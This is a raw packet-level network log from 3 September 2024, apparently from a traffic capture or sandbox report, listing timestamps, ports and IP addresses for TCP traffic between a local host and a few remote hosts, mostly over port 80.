Sep 3, 2024 17:13:22.409105062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409117937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409132957 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409135103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409135103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409179926 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409245014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409491062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409503937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409516096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409534931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409559011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409775972 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409780025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409792900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409809113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409843922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409967899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409976006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.409981012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.409996986 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410010099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410022974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410043955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410043955 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410121918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410136938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410208941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410208941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410255909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410271883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410284996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410299063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410305023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410347939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410396099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410408974 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410423994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.410501003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.410501003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411005020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411019087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411027908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411096096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411096096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411134005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411147118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411161900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411176920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411214113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411214113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411268950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411277056 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411283970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411298990 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411313057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411341906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411341906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411341906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411395073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411407948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411417961 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411422014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411433935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411454916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411569118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411581993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411597013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411611080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411638975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411716938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411880970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411894083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411909103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411921024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411935091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.411948919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.411948919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.412049055 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.449348927 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.453138113 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:22.458039045 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.502190113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502206087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502221107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502276897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502290010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502305984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502324104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502337933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502338886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502338886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502377033 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502409935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502424002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502441883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502444983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502469063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502469063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502486944 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502500057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502549887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502549887 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502602100 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502682924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502697945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502712011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502727032 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502743006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502758026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502773046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.502774954 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502801895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502801895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502801895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.502883911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503016949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503031015 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503046989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503061056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503074884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503089905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503103971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503115892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503129959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503129959 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503144026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503156900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503173113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503195047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503210068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503211021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503226042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503240108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503240108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503241062 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.503273964 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503290892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.503290892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.504812956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.504951000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.504965067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.504976988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505038977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505053043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505072117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505086899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505088091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505117893 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505170107 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505601883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505614996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505629063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505695105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505708933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505728960 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505729914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505744934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505744934 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505760908 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505800009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505821943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505870104 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505903959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505916119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505918026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505932093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505945921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505959034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.505971909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.505971909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506005049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506067038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506192923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506248951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506261110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506330967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506330967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506330967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506346941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506361008 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506376982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506400108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506414890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506414890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506414890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506429911 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506444931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506458998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506490946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506490946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506555080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506567955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506586075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506603003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506603003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506692886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506706953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506721973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506731987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506737947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506753922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506768942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506773949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506784916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.506814003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506814003 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.506875992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507671118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507684946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507700920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507725954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507740021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507759094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507759094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507759094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507774115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507803917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507817984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507817984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507817984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507847071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507862091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507885933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507945061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507957935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507971048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.507975101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.507987022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508001089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508018970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.508018970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.508584023 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.508759975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508850098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508856058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.508862972 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508887053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508902073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508917093 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.508945942 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508961916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.508979082 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509043932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509087086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509124041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509139061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509171963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509197950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509197950 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509242058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509254932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509269953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509284973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509299994 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509315968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509403944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509403944 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509490967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509504080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509519100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509571075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509571075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509617090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509659052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509681940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509696960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509711981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.509785891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.509852886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.537674904 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:22.537838936 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:22.601084948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601103067 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601116896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601192951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601207018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601221085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601224899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601224899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601224899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601237059 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601248026 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601268053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601320982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601336002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601346970 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601350069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601361990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601366997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601382971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601402044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601444006 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601541042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601556063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601568937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601582050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601591110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601644993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601644993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601737022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601751089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601766109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601779938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.601800919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601800919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601852894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.601852894 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602185011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602197886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602210999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602225065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602238894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602250099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602251053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602263927 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602277040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602289915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602303982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602318048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602330923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602330923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602330923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602330923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602333069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602330923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602363110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602363110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602426052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602437019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602449894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.602466106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.602471113 CEST	80	49730	52.212.52.84	192.168.2.8
